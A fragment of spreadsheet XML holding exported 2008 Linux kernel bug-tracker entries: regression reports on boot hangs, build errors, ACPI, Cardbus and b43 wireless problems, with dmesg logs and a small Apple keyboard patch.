  <si>
    <t>2008-05-23 15:53 UTC</t>
  </si>
  <si>
    <t>2008-10-15 03:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: Distribution: Debian testing Hardware Environment: serial converter FT232BM Software Environment: 2.6.25 and minicom Problem Description: Hi there, when connected via minicom and device is unplugged from port (minicom still running) kernel starts filling dmesg with message ftdi_tiocmget Could not get modem status of device - err: -19 until minicom is quited Steps to reproduce: connect cable, start minicom to /dev/ttyUSBx device, unplug converter from usb port.</t>
  </si>
  <si>
    <t>parisc: 64bit SMP does not boot on J5600</t>
  </si>
  <si>
    <t>2008-05-24 14:03 UTC</t>
  </si>
  <si>
    <t>2008-07-06 14:33 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc3 64bit SMP does not boot on J5600 Submitter : Domenico Andreoli &lt;cavokz@gmail.com&gt; Date : 2008-05-22 16:14 References : http://marc.info/?l=linux-kernel&amp;m=121147328028081&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pcie hotplug bootup crash fix</t>
  </si>
  <si>
    <t>2008-05-24 14:08 UTC</t>
  </si>
  <si>
    <t>2008-06-11 22:57 UTC</t>
  </si>
  <si>
    <t>Subject : pcie hotplug bootup crash fix Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-05-24 16:58 References : http://marc.info/?l=linux-kernel&amp;m=121164842212038&amp;w=4 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121164842212038&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mips/kernel/traps.c build error</t>
  </si>
  <si>
    <t>2008-05-25 09:48 UTC</t>
  </si>
  <si>
    <t>2008-06-05 15:00 UTC</t>
  </si>
  <si>
    <t>Subject : mips/kernel/traps.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/5/25/158 Patch : in the mips tree</t>
  </si>
  <si>
    <t>mips: CONF_CM_DEFAULT build error</t>
  </si>
  <si>
    <t>2008-05-25 10:11 UTC</t>
  </si>
  <si>
    <t>2008-06-16 13:54 UTC</t>
  </si>
  <si>
    <t>Subject : mips: CONF_CM_DEFAULT build error Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/5/25/168</t>
  </si>
  <si>
    <t>MIPS SEAD compile fix</t>
  </si>
  <si>
    <t>2008-05-25 11:10 UTC</t>
  </si>
  <si>
    <t>2008-06-05 14:58 UTC</t>
  </si>
  <si>
    <t>Subject : MIPS SEAD compile fix Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/5/25/178 Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2008/5/25/178</t>
  </si>
  <si>
    <t>PS/2 keyboard becomes dead/non-responsive on boot with kernel &gt; 2.6.24.3-50.fc8</t>
  </si>
  <si>
    <t>&gt; 2.6.24.3-50.fc8</t>
  </si>
  <si>
    <t>2008-05-25 12:36 UTC</t>
  </si>
  <si>
    <t>2008-06-21 01:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24.3-50.fc8 Earliest failing kernel version: &gt; 2.6.24.3-50.fc8 Distribution: FEDORA Hardware Environment: x86_64 two xeon 3.0 GHz CPU/ ASUS ncch-dl MB Software Environment: Fedora 8 Problem Description: During boot the keyboard becomes unresponsive/dead. The keyboard stops working after a finite period of time and can be monitored by pressing the caps lock on and off until the light no longer responds. Steps to reproduce: Install kernel &gt; 2.6.24.3-50.fc8 using YUM boot to that kernel keybaord stops working, get second PC ssh into first pc shutdown first pc. I've also posted this to Fedora bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=446763 I'm currently going back to a pure kernel.org kernel 2.6.24.3 installing and then will try patching until it becomes faulty (if it becomes faulty). I've tried booting into kernel 2.6.25 and that works fine.</t>
  </si>
  <si>
    <t>kbuild variable $(src) broken in 2.6.23-rc3?</t>
  </si>
  <si>
    <t>2008-05-26 08:13 UTC</t>
  </si>
  <si>
    <t>2008-06-02 18:52 UTC</t>
  </si>
  <si>
    <t>Subject : kbuild variable $(src) broken in 2.6.23-rc3? Submitter : tvrtko.ursulin &lt;tvrtko.ursulin@sophos.com&gt; Date : 2008-05-21 14:42 References : http://marc.info/?l=linux-kbuild&amp;m=121138246208259&amp;w=2 Handled-By : Sam Ravnborg &lt;sam@ravnborg.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Cardbus slots in Thinkpad Dock/Dock II fail IRQ allocation - T30</t>
  </si>
  <si>
    <t>2.6.26-rc4</t>
  </si>
  <si>
    <t>2008-05-27 06:14 UTC</t>
  </si>
  <si>
    <t>Paul Martin</t>
  </si>
  <si>
    <t>2010-03-31 23:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Early 2.6 -- not worked for a good while Distribution: Debian Hardware Environment: Thinkpad T30 + Dock or Dock II Problem Description: The Cardbus slots are recognised, but due to one of them not getting allocated an IRQ, the initialization of both fails. ACPI: \_SB_.PCI0.PCI1.DOCK - docking acpiphp_glue: handle_hotplug_event_func: Bus check notify on \_SB_.PCI0.PCI1.DOCK PCI: Found 0000:02:03.0 [104c/ac22] 000604 01 PCI: Scanning behind PCI bridge 0000:02:03.0, config 000000, pass 0 PCI: Scanning behind PCI bridge 0000:02:03.0, config 000000, pass 1 PCI: Scanning bus 0000:08 PCI: Found 0000:08:01.0 [1095/0648] 000101 00 PCI: Found 0000:08:02.0 [104c/ac51] 000607 02 PCI: Found 0000:08:02.1 [104c/ac51] 000607 02 PCI: Fixups for bus 0000:08 PCI: Transparent bridge - 0000:02:03.0 PCI: Scanning behind PCI bridge 0000:08:02.0, config 000000, pass 0 PCI: Scanning behind PCI bridge 0000:08:02.1, config 000000, pass 0 PCI: Scanning behind PCI bridge 0000:08:02.0, config 000000, pass 1 PCI: Bus #09 (-#0c) is partially hidden behind transparent bridge #02 (-#08) PCI: Scanning behind PCI bridge 0000:08:02.1, config 000000, pass 1 PCI: Bus #0d (-#10) is partially hidden behind transparent bridge #02 (-#08) PCI: Bus scan for 0000:08 returning with max=10 PCI: Bus #08 (-#10) is partially hidden behind transparent bridge #02 (-#08) PCI: region 0000:08:02.0/9 too large: 0x0000000000000000-0x0000000003ffffff PCI: region 0000:08:02.1/9 too large: 0x0000000000000000-0x0000000003ffffff PCI: region 0000:08:02.0/10 too large: 0x0000000000000000-0x0000000003ffffff PCI: region 0000:08:02.1/10 too large: 0x0000000000000000-0x0000000003ffffff acpiphp_glue: bus exists... trim acpiphp_glue: acpi_bus_trim return 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1.DOCK._PRT] PCI: Bus 3, cardbus bridge: 0000:02:00.0 IO window: 0x00004000-0x000040ff IO window: 0x00004400-0x000044ff PREFETCH window: 0xf0000000-0xf3ffffff MEM window: 0xd4000000-0xd7ffffff PCI: Bus 7, cardbus bridge: 0000:02:00.1 IO window: 0x00004800-0x000048ff IO window: 0x00004c00-0x00004cff PREFETCH window: 0xf4000000-0xf7ffffff MEM window: 0xd8000000-0xdbffffff got res [d0300000:d0300fff] bus [d0300000:d0300fff] flags 20200 for BAR 0 of 0000:08:02.0 PCI: moved device 0000:08:02.0 resource 0 (20200) to d0300000 got res [d0301000:d0301fff] bus [d0301000:d0301fff] flags 20200 for BAR 0 of 0000:08:02.1 PCI: moved device 0000:08:02.1 resource 0 (20200) to d0301000 got res [6000:600f] bus [6000:600f] flags 20101 for BAR 4 of 0000:08:01.0 got res [6000:600f] bus [6000:600f] flags 20101 for BAR 4 of 0000:08:01.0 PCI: moved device 0000:08:01.0 resource 4 (20101) to 6000 got res [6010:6017] bus [6010:6017] flags 20101 for BAR 0 of 0000:08:01.0 PCI: moved device 0000:08:01.0 resource 0 (20101) to 6010 got res [6018:601f] bus [6018:601f] flags 20101 for BAR 2 of 0000:08:01.0 PCI: moved device 0000:08:01.0 resource 2 (20101) to 6010 got res [6020:6023] bus [6020:6023] flags 20101 for BAR 1 of 0000:08:01.0 PCI: moved device 0000:08:01.0 resource 1 (20101) to 6020 got res [6024:6027] bus [6024:6027] flags 20101 for BAR 3 of 0000:08:01.0 PCI: moved device 0000:08:01.0 resource 3 (20101) to 6020 PCI: Bus 9, cardbus bridge: 0000:08:02.0 IO window: 0x00005000-0x000050ff IO window: 0x00005400-0x000054ff PCI: Bus 13, cardbus bridge: 0000:08:02.1 IO window: 0x00005800-0x000058ff IO window: 0x00005c00-0x00005cff PCI: Bridge: 0000:02:03.0 IO window: 5000-6fff MEM window: 0xd0300000-0xd03fffff PREFETCH window: disabled. decode_hpp: Could not get hotplug parameters. Use defaults pci 0000:02:03.0: enabling device (0000 -&gt; 0003) PCI: Enabling bus mastering for device 0000:02:03.0 pci 0000:08:02.0: enabling device (0000 -&gt; 0003) ACPI: PCI Interrupt 0000:08:02.0[A] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 PCI: Enabling bus mastering for device 0000:08:02.0 PCI: Setting latency timer of device 0000:08:02.0 to 64 pci 0000:08:02.1: enabling device (0000 -&gt; 0003) ACPI: Unable to derive IRQ for device 0000:08:02.1 ACPI: PCI Interrupt 0000:08:02.1[B]: no GSI PCI: Enabling bus mastering for device 0000:08:02.1 PCI: Setting latency timer of device 0000:08:02.1 to 64 Yenta: CardBus bridge found at 0000:08:02.0 [1014:0148] PCI: Bus 9, cardbus bridge: 0000:08:02.0 IO window: 0x00005000-0x000050ff IO window: 0x00005400-0x000054ff PREFETCH window: 0xd0400000-0xd07fffff MEM window: 0xd0800000-0xd0bfffff Yenta: Enabling burst memory read transactions Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:08:02.0, mfunc 0x00001000, devctl 0x66 Yenta: ISA IRQ mask 0x0000, PCI irq 11 Socket status: 30000006 pcmcia: parent PCI bridge I/O window: 0x5000 - 0x6fff cs: IO port probe 0x5000-0x6fff: clean. pcmcia: parent PCI bridge Memory window: 0xd0300000 - 0xd03fffff pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff pcmcia: parent PCI bridge Memory window: 0xd0200000 - 0xdfffffff pcmcia: parent PCI bridge Memory window: 0xf0000000 - 0xf7ffffff Yenta: CardBus bridge found at 0000:08:02.1 [1014:0148] PCI: Bus 13, cardbus bridge: 0000:08:02.1 IO window: 0x00005800-0x000058ff IO window: 0x00005c00-0x00005cff PREFETCH window: 0xd0c00000-0xd0ffffff MEM window: 0xd1000000-0xd13fffff Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:08:02.1, mfunc 0x00001000, devctl 0x66 Yenta: request_irq() in yenta_probe_cb_irq() failed! Yenta TI: socket 0000:08:02.1 no PCI interrupts. Fish. Please report. Yenta: no PCI IRQ, CardBus support disabled for this socket. Yenta: check your BIOS CardBus, BIOS IRQ or ACPI settings. Yenta: ISA IRQ mask 0x0000, PCI irq 0 Socket status: 30000006 pcmcia: parent PCI bridge I/O window: 0x5000 - 0x6fff cs: IO port probe 0x5000-0x6fff: clean. pcmcia: parent PCI bridge Memory window: 0xd0300000 - 0xd03fffff pcmcia: parent PCI bridge I/O window: 0x4000 - 0x8fff pcmcia: parent PCI bridge Memory window: 0xd0200000 - 0xdfffffff pcmcia: parent PCI bridge Memory window: 0xf0000000 - 0xf7ffffff</t>
  </si>
  <si>
    <t>ACPI C-State missing since 2.6.19.3</t>
  </si>
  <si>
    <t>&gt;= 2.6.19.3</t>
  </si>
  <si>
    <t>2008-05-27 10:31 UTC</t>
  </si>
  <si>
    <t>Matthias</t>
  </si>
  <si>
    <t>2010-10-02 01:59 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.18.8 Kernel 2.6.19 to 2.6.19.2 won't compile, so not tested Earliest failing kernel version: 2.6.19.3 Distribution: Arch Linux Hardware Environment: * Intel Pentium Dual-Core / Core 2 Duo CPU * Intel GM965 / PM965 Chipset Software Environment: Vanilla-kernel Problem Description: ACPI C3-State (Pentium) or C4-State (Core 2) isn't detected anymore and laptop consumes more power. I've also tested some other Live-CDs: if kernel &lt;= 2.6.18.8 C3 works, if kernel is newer C3 doesn't work. Problem still exists in version 2.6.25.4. Bootmessages kernel version 2.16.18.8: Allocate Port Service[0000:00:1c.5:pcie02] ACPI: AC Adapter [ACAD] (on-line) ACPI: Battery Slot [BAT1] (battery absent) ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID0] ACPI: Power Button (CM) [PWRB] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Cst] [20060707] ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU0] (supports 8 throttling states) ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Cst] [20060707] ACPI: CPU1 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU1] (supports 8 throttling states) Real Time Clock Driver v1.12ac 2.6.19.3: Allocate Port Service[0000:00:1c.5:pcie02] ACPI: AC Adapter [ACAD] (on-line) ACPI: Battery Slot [BAT1] (battery absent) ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID0] ACPI: Power Button (CM) [PWRB] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Cst] [20060707] Monitor-Mwait will be used to enter C-1 state Monitor-Mwait will be used to enter C-2 state ACPI: CPU0 (power states: C1[C1] C2[C2]) ACPI: Processor [CPU0] (supports 8 throttling states) ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Cst] [20060707] ACPI: CPU1 (power states: C1[C1] C2[C2]) ACPI: Processor [CPU1] (supports 8 throttling states) Real Time Clock Driver v1.12ac /proc/acpi/processor/CPU0/power 2.6.18.8: active state: C3 max_cstate: C8 bus master activity: 00000000 states: C1: type[C1] promotion[C2] demotion[--] latency[000] usage[00000010] duration[00000000000000000000] C2: type[C2] promotion[C3] demotion[C1] latency[001] usage[00000060] duration[00000000000000352022] *C3: type[C3] promotion[--] demotion[C2] latency[017] usage[00034890] duration[00000000000477579415] 2.6.19.3: active state: C2 max_cstate: C8 bus master activity: 00000000 maximum allowed latency: 8000 usec states: C1: type[C1] promotion[C2] demotion[--] latency[001] usage[00000370] duration[00000000000000000000] *C2: type[C2] promotion[--] demotion[C1] latency[017] usage[00023870] duration[00000000000166137636] "acpitool -c" 2.6.18.8: CPU type : Intel(R) Pentium(R) Dual CPU T2330 @ 1.60GHz CPU speed : 1596.004 MHz Cache size : 1024 KB Bogomips : 3196.88 Bogomips : 3192.11 # of CPU's found : 2 Processor ID : 0 Bus mastering control : yes Power management : yes Throttling control : yes Limit interface : yes Active C-state : C3 C-states (incl. C0) : 3 Usage of state C1 : 60 (0.2 %) Usage of state C2 : 39778 (99.8 %) T-state count : 8 Active T-state : T0 Processor ID : 1 Bus mastering control : yes Power management : yes Throttling control : yes Limit interface : yes Active C-state : C3 C-states (incl. C0) : 3 Usage of state C1 : 128 (0.2 %) Usage of state C2 : 75167 (99.8 %) T-state count : 8 Active T-state : T0 2.6.19.3: CPU type : Intel(R) Pentium(R) Dual CPU T2330 @ 1.60GHz CPU speed : 1596.005 MHz Cache size : 1024 KB Bogomips : 3196.92 Bogomips : 3192.04 # of CPU's found : 2 Processor ID : 0 Bus mastering control : yes Power management : yes Throttling control : yes Limit interface : yes Active C-state : C2 C-states (incl. C0) : 3 Usage of state C1 : 440 (1.3 %) Usage of state C2 : 33768 (98.7 %) T-state count : 8 Active T-state : T0 Processor ID : 1 Bus mastering control : yes Power management : yes Throttling control : yes Limit interface : yes Active C-state : C1 C-states (incl. C0) : 3 Usage of state C1 : 273 (0.7 %) Usage of state C2 : 2642 (7.2 %) T-state count : 8 Active T-state : T0</t>
  </si>
  <si>
    <t>2.6.22 boot hang - 2.6.19 worked - Gericom notebook</t>
  </si>
  <si>
    <t>2.6.22.*</t>
  </si>
  <si>
    <t>2008-05-28 05:54 UTC</t>
  </si>
  <si>
    <t>2008-10-16 22:19 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.19.7 Earliest failing kernel version: 2.6.22.* Distribution: Debian Hardware Environment: notebook Software Environment: Problem Description: hangs early on boot [perhaps it belongs to acpi_bios, nevertheless it might complement/relate to #10811] I failed to make 2.6.22.* boot on at least a couple of notebook (I've made more trials on 2). Booting hangs just after a few 'ACPI ... ' lines are printed, and after (on 2.6.22.19) I get the msg from acpi stack (circa) '... try with "acpi_osi=!Linux" ...' which I did but with no success. I know it's an aged kernel, nevertheless since I'm having troubles with ACPI in latest version (see #10811), I hope this bit offer some hunch to devels. I'll try to provide more info on specific request - these are 'travelling' machines and to get such infos I'd need them phisically in my hands. DSDT and such still easy, though, of course, if needed. thanks Steps to reproduce:</t>
  </si>
  <si>
    <t>2.6.26-rc4: RIP __call_for_each_cic+0x20/0x50</t>
  </si>
  <si>
    <t>2008-05-28 15:44 UTC</t>
  </si>
  <si>
    <t>2008-05-30 02:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc4: RIP __call_for_each_cic+0x20/0x50 Submitter : adobriyan@gmail.com Date : 2008-05-27 09:27 References : http://lkml.org/lkml/2008/5/27/11 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Handled-By : "Paul E. McKenney" &lt;paulmck@linux.vnet.ibm.com&gt; Patch : http://lkml.org/lkml/2008/5/28/88 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc4: RIP find_pid_ns+0x6b/0xa0</t>
  </si>
  <si>
    <t>2008-05-28 15:52 UTC</t>
  </si>
  <si>
    <t>2008-07-13 11:08 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc4: RIP find_pid_ns+0x6b/0xa0 Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Date : 2008-05-27 09:23 References : http://lkml.org/lkml/2008/5/27/9 Handled-By : Oleg Nesterov &lt;oleg@tv-sign.ru&gt; Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Handled-By : "Paul E. McKenney" &lt;paulmck@linux.vnet.ibm.com&gt; Patch : http://lkml.org/lkml/2008/5/28/16 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>vt/fbcon: fix background color on line feed</t>
  </si>
  <si>
    <t>2008-05-28 16:02 UTC</t>
  </si>
  <si>
    <t>2008-06-08 09:51 UTC</t>
  </si>
  <si>
    <t>Subject : vt/fbcon: fix background color on line feed Submitter : thunder7 &lt;thunder7@xs4all.nl&gt; Date : 2008-05-27 19:33 References : http://marc.info/?l=linux-kernel&amp;m=121191733218735&amp;w=4 Handled-By : Jan Engelhardt &lt;jengelh@medozas.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121199453010047&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>COMRESET on resume where SATA link power management is enabled</t>
  </si>
  <si>
    <t>2.6.24-17-generic</t>
  </si>
  <si>
    <t>2008-05-29 03:35 UTC</t>
  </si>
  <si>
    <t>2008-10-12 23:59 UTC</t>
  </si>
  <si>
    <t>Using Ubuntu 8.04 I get a slow resume from suspend with a COMRESET error for my drive if I have previously enabled sata link power management. Does this explicitly need to be disabled before suspending, or should the kernel be handling this situation by explicitly waking up the link on resume?</t>
  </si>
  <si>
    <t>[PATCH] fix apple alu keyboard</t>
  </si>
  <si>
    <t>2008-05-29 07:33 UTC</t>
  </si>
  <si>
    <t>Martin Capitanio</t>
  </si>
  <si>
    <t>2016-01-02 00:26 UTC</t>
  </si>
  <si>
    <t>* Two keys ( &lt; ^ ) were incorrectly swapped for no apparent reason. * The F-keys stopped working to a usable level expected by a normal Linux user. Modify default FN key behavior on Apple keyboards. diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c index 5c52a20..e659e9e 100644 --- a/drivers/hid/hid-input.c +++ b/drivers/hid/hid-input.c @@ -32,7 +32,7 @@ #include &lt;linux/hid.h&gt; #include &lt;linux/hid-debug.h&gt; -static int hid_apple_fnmode = 1; +static int hid_apple_fnmode = 2; module_param_named(pb_fnmode, hid_apple_fnmode, int, 0644); MODULE_PARM_DESC(pb_fnmode, "Mode of fn key on Apple keyboards (0 = disabled, 1 = fkeyslast, 2 = fkeysfirst)"); diff --git a/drivers/hid/usbhid/hid-quirks.c b/drivers/hid/usbhid/hid-quirks.c index 1df832a..bf7d0ae 100644 --- a/drivers/hid/usbhid/hid-quirks.c +++ b/drivers/hid/usbhid/hid-quirks.c @@ -634,7 +634,7 @@ static const struct hid_blacklist { { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_ISO, HID_QUIRK_APPLE_NUMLOCK_EMULATION | HID_QUIRK_APPLE_HAS_FN | HID_QUIRK_IGNORE_MOUSE | HID_QUIRK_APPLE_ISO_KEYBOARD}, { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_JIS, HID_QUIRK_APPLE_NUMLOCK_EMULATION | HID_QUIRK_APPLE_HAS_FN | HID_QUIRK_IGNORE_MOUSE }, { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_ANSI, HID_QUIRK_APPLE_HAS_FN }, - { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_ISO, HID_QUIRK_APPLE_HAS_FN | HID_QUIRK_APPLE_ISO_KEYBOARD }, + { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_ISO, HID_QUIRK_APPLE_HAS_FN }, { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_JIS, HID_QUIRK_APPLE_HAS_FN }, { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ANSI, HID_QUIRK_APPLE_NUMLOCK_EMULATION | HID_QUIRK_APPLE_HAS_FN | HID_QUIRK_IGNORE_MOUSE }, { USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_GEYSER4_HF_ISO, HID_QUIRK_APPLE_NUMLOCK_EMULATION | HID_QUIRK_APPLE_HAS_FN | HID_QUIRK_IGNORE_MOUSE },</t>
  </si>
  <si>
    <t>Fatal DMA error with b43 driver since 2.6.26</t>
  </si>
  <si>
    <t>2008-05-29 13:16 UTC</t>
  </si>
  <si>
    <t>2008-06-19 00:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.4 Earliest failing kernel version: 2.6.26-rc4 at least Earlier 2.6.26-rc not tested Distribution: Bluewhite64 (64 bit slackware) Hardware Environment: b43 chip, Acer Aspire 1511 LMi Software Environment: Latest b43 firmware, iwconfig v29 Problem Description: Since 2.6.26, b43 driver doesn't manage to initialize DMA and doesn't work at all anymore, at least on my hardware. It's impossible to scan, with the following result from iwconfig: eth1 Failed to read scan data : Resource temporarily unavailable dmesg output is: firmware: requesting b43/ucode5.fw firmware: requesting b43/pcm5.fw firmware: requesting b43/b0g0initvals5.fw firmware: requesting b43/b0g0bsinitvals5.fw b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) b43-phy0 debug: Chip initialized b43-phy0 debug: 30-bit DMA initialized b43-phy0 ERROR: Fatal DMA error: 0x00001000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000 b43-phy0: Controller RESET (DMA error) ... b43-phy0 debug: Wireless interface started b43-phy0 debug: Adding Interface type 2 b43-phy0 debug: Wireless interface stopped b43-phy0 debug: DMA-30 rx_ring: Used slots 0/64, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BK: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BE: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VI: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VO: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_mcast: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) b43-phy0 debug: Chip initialized b43-phy0 debug: 30-bit DMA initialized b43-phy0 ERROR: Fatal DMA error: 0x00001000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000 b43-phy0: Controller RESET (DMA error) ... b43-phy0 debug: Wireless interface started b43-phy0: Controller restarted ADDRCONF(NETDEV_UP): eth1: link is not ready b43-phy0 debug: Wireless interface stopped b43-phy0 debug: DMA-30 rx_ring: Used slots 0/64, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BK: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BE: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VI: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VO: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_mcast: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) b43-phy0 debug: Chip initialized b43-phy0 debug: 30-bit DMA initialized b43-phy0 ERROR: Fatal DMA error: 0x00001000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000 b43-phy0: Controller RESET (DMA error) ... b43-phy0 debug: Wireless interface started b43-phy0: Controller restarted b43-phy0 debug: Wireless interface stopped b43-phy0 debug: DMA-30 rx_ring: Used slots 0/64, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BK: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BE: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VI: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VO: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_mcast: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) b43-phy0 debug: Chip initialized b43-phy0 debug: 30-bit DMA initialized b43-phy0 ERROR: Fatal DMA error: 0x00001000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000 b43-phy0: Controller RESET (DMA error) ... b43-phy0 debug: Wireless interface started b43-phy0 debug: Wireless interface stopped b43-phy0 debug: DMA-30 rx_ring: Used slots 0/64, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BK: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_BE: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VI: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_AC_VO: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0 debug: DMA-30 tx_ring_mcast: Used slots 0/128, Failed frames 0/0 = 0.0%, Average tries 0.00 b43-phy0: Loading firmware version 410.2160 (2007-05-26 15:32:10) b43-phy0 debug: Chip initialized b43-phy0 debug: 30-bit DMA initialized __ratelimit: 1 messages suppressed Steps to reproduce: Boot 2.6.25-rc4, try to scan or associate on failing hardware.</t>
  </si>
  <si>
    <t>stuck localhost TCP connections, v2.6.26-rc3+</t>
  </si>
  <si>
    <t>2008-05-29 14:41 UTC</t>
  </si>
  <si>
    <t>2008-06-14 05:57 UTC</t>
  </si>
  <si>
    <t>Subject : [bug] stuck localhost TCP connections, v2.6.26-rc3+ Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-05-26 11:56 References : http://marc.info/?l=linux-kernel&amp;m=121180311931349&amp;w=4 Handled-By : "Ilpo Järvinen" &lt;ilpo.jarvinen@helsinki.fi&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>m68k libc5 regression</t>
  </si>
  <si>
    <t>Commit 4cc6028d4040f95cdb590a87db478b42b8be0508</t>
  </si>
  <si>
    <t>2008-05-29 14:45 UTC</t>
  </si>
  <si>
    <t>2008-07-20 14:42 UTC</t>
  </si>
